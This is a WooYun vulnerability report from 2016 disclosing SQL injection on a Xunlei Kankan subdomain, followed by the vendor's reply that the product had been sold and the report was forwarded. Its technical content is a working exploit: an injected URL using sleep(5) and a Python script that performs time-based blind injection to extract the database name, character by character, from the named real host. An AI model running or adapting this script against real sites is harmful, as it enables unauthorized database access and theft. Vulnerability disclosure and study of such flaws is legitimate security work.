当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0178699

漏洞标题:迅雷看看某分站存在SQL注入

相关厂商:迅雷

漏洞作者: getshell1993

提交时间:2016-02-25 22:56

修复时间:2016-02-26 09:46

公开时间:2016-02-26 09:46

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-02-25: 细节已通知厂商并且等待厂商处理中
2016-02-26: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

迅雷看看某分站,附验证脚本。

详细说明:

http://w.star.kankan.com/?birthday=2000&stature=170&level=0&sex=0&order=id and sleep(5)

漏洞证明:

import requests
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
payloads = list('abcdefghijklmnopqrstuvwxyz0123456789@_.')
user = ''
print "test..."
for i in range(1,11):
for payload in payloads:
aaa=" --"
d="SELECT IF(substr(database() from %s for 1) = '%s', sleep(2), false)"% (i, payload)
#pq={'q':'area','area_id':d}
test = d + aaa
#print test
r = requests.get('http://w.star.kankan.com/?birthday=2000&stature=170&level=0&sex=0&order=id;'+test)
if r.elapsed.seconds>=1:
user += payload
#print payload.strip()
break
print user


1.png


2.png

修复方案:

过滤

版权声明:转载请注明来源 getshell1993@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-02-26 09:46

厂商回复:

感谢您的反馈,但是看看产品已经出售给响巢公司了。
已帮您转响巢的负责人了。

最新状态:

暂无